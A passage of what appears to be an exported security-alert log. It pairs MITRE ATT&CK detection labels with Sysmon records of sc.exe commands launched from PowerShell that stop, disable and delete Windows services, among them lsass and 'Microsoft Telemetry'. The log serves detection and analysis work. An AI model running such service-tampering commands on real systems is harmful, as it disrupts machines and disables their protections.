0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.225"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010d6623000}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.384",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.172 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00100c603000} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.175885900Z"",""eventRecordID"":""3754"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.172\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00100c603000}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.172"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00100c603000}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.355",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.154 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010fc5e3000} +ProcessId: 3668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config system Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config system Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.158125200Z"",""eventRecordID"":""3753"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.154\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010fc5e3000}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config system Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.154"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010fc5e3000}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config system Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.283",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.097 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00103f5d3000} +ProcessId: 7712 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.101085500Z"",""eventRecordID"":""3751"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.097\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00103f5d3000}\r\nProcessId: 7712\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.097"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00103f5d3000}"",""processId"":""7712"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.048 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e55a3000} +ProcessId: 2492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.053948600Z"",""eventRecordID"":""3748"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.048\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e55a3000}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.048"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010e55a3000}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.193",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.928 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001012593000} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.979249200Z"",""eventRecordID"":""3746"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.928\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001012593000}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.928"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001012593000}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.174",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.828 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001044583000} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.833250700Z"",""eventRecordID"":""3745"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.828\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001044583000}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.828"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001044583000}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John 